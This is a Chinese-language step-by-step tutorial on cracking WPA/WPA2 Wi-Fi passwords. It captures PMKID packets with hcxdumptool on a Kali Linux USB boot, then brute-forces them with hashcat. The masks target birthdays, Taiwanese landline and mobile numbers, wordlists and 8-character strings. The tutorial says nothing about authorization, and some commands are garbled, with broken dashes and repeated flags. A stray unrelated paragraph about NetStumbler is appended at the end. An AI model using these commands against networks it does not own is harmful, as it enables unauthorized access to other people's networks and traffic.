破解 WIFA WPA 密碼

1. 建立 Kali Linux 開機隨身碟：下載 Kali Linux ISO 檔，再運用 rufus 建立開機隨身碟。

2. 筆電設成隨身碟開機。

3. 隨身碟插入筆電，筆電重開機，啟動 Kali Linux。

4. 開啟終端機模擬器，字型設置 28 點。

5. 啟動網路管理服務。

   sudo systemctl start NetworkManager

   sudo systemctl status NetworkManager

6. 檢查無線網卡狀態。

   nmcli device status

7. 啟動網卡。

   nmcli networking on

8. 查詢可用無線網路。

   nmcli device wifi list

9. 連接網路。

   nmcli device wifi connect “SSID” password “password”

10. 確認連接成功。

    nmcli connection show

11. 安裝破解工具。

    sudo apt update

    sudo apt install hcxdumptool

    sudo apt install hcxtools

12. 關閉無線網路管理服務。

    sudo systemctl stop NetworkManager.service

    sudo systemctl stop wpa_supplicant.service

13. 下載封包至 dumpfile.pcapng 檔案，參閱hcxdumptool 選項。

    sudo hcxdumptool -i wlan0 -w dumpfile.pcapng -F –rds=1

14. 轉換封包格式，參閱hcxpcapngtool 選項。

    hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng

15. 啟用網際網路，把散列檔上傳雲端硬碟，如 wlan0 消失，請參閱處理方式。

    sudo systemctl start wpa_supplicant.service

    sudo systemctl start NetworkManager.service

16. 重以微軟視窗系統開機，於關機重開前拔出隨身碟。

    sudo reboot

17. 在微軟視窗系統至雲端硬碟下載散列檔，嗣安裝破解程式破解金鑰。

18. 破解設為生日8碼者，2分鐘內。

    hashcat -a 3 -m 22000 hash.hc22000 19?d?d?d?d?d?d?d?d

    hashcat -a 3 -m 22000 hash.hc22000 20?d?d?d?d?d?d?d?d

19. 破解設為電話號碼者。

    hashcat -a 3 -m 22000 hash.hc22000 -a 3 039?d?d?d?d?d?d?d

    hashcat -a 3 -m 22000 hash.hc22000 -a 3 038?d?d?d?d?d?d?d

    hashcat -a 3 -m 22000 hash.hc22000 -a 3 07?d?d?d?d?d?d?d

20. 破解設為手機號碼者。

    hashcat -a 3 -m 22000 –session sname hash.hc22000 -a 3 09?d?d?d?d?d?d?d?d

21. 破解設為收錄常用密碼字典者。

    hashcat -a 0 -m 22000 hash.hc22000 wordlist.txt

22. 破解設為 8 至 9 個數字者。

    hashcat -m 22000 –session sname hash.hc22000 -a 3 –increment –increment-min 8 –increment-max 9 ?d?d?d?d?d?d?d?d?d?d?d?d –show

23. 破解設為 8 文數字者。

    hashcat -m 22000 hash.hc22000 -a 3 ?a?a?a?a?a?a?a?a –show

24. 按下 c 執行暫存測試狀態並停止破解程式。

25. 輸入指令hashcat --restore重啟破解程序。

26. 破解網站(https://crackstation.net/)

硬體

我使用的硬體是 ASUS VivoBook S13 筆電，配備 GeForce MX150 顯卡（1600/2048 MB, 512 MB allocatable, 3MCU)。惟 Windows 無法運用 hcxdumptool 擷取封包，及執行 hcxpcaptool 萃取 PMKID 封包，先用隨身碟執行 Kali Linux 系統萃取 PMKID 封包。再因 Kali Linux 之 hashcat 無法使用顯卡再轉至 Windows 執行 hashcat 使用顯卡運算。

筆電設成隨身碟開機

HP 商用筆電

1. 重開機顯示商標畫面時，按下 ESC 進入 BIOS 畫面。
2. 進入 Security 分頁，將選項 Secure Boot Control 設為 Disabled。
3. 進入 Boot 分頁，將選項 Fast Boot 設為 Disabled。
4. Boot Menu 設定 Boot Order 設隨身碟為第一個開機。
5. 儲存設定並重開機。

ASUS

1. 筆電 (ASUS VivoBook S13) 重開機顯示ASUS 商標畫面時，按下 F2 進入 BIOS 畫面。
2. 按 F8 進入 Security 分頁，將選項 Secure Boot Control 設為 Disabled。
3. 進入 Boot 分頁，將選項 Fast Boot 設為 Disabled。
4. 按 F10 儲存設定並重開機。
5. 於顯示ASUS 商標畫面時，按 F2 進入 BIOS 畫面。
6. Boot Menu設定 Boot Order 設為隨身碟。

WPA PSK 安全機制

wifi 的 WPA PSK(Wi-Fi Protected Access pre-shared key)安全機制，亦稱 WPA-Personal，為預設共享金鑰機制，使用者必須輸入預先設定金鑰接入網路，金鑰係8至63個ASCII字元或是64個16進位數字(256位元)。

hcxdumptool 選項

1. --rds=1：最近封包列在最上方。
2. -F：

hcxpcapngtool 選項

1. -E essidlist：提取列出文件所有 ESSID

wlan0 消失之處理方式

wlan0 可能因為轉換為 monitor 模式，再啟動消失，須轉換為一般模式，再啟動。

sudo ip link set wlan0 down
sudo iw wlan0 set type managed
sudo ip link set wlan0 up
sudo systemctl restart NetworkManager

hashcat 選項

1. -o cracked_file：指定破解碼儲存檔。
2. -a 0：指定字典攻擊。
3. ?a：表示ASCII大小寫英文及符號字元。 # NetStumbler

免費無線網路訊號測試軟體–NetStumbler(Network Stumbler)，可以偵測 AP 無線基地台的訊號強度，測試方法很簡單，只要在 SSIDs 下面點選你要即時監測的 AP 名稱下的 MAC 位址，便可以顯示訊號的雜訊比 dBm 值，雜訊比越小代表訊號越強，圖形也就越高，可以用來比較 AP 的訊號強度，且有明確的數據，由於他是 Packet Sniffer for Wireless Networks 軟體，封包監測的時候會卡頻寬，不用的時候要停止監測或關閉他，才不會影響你上網。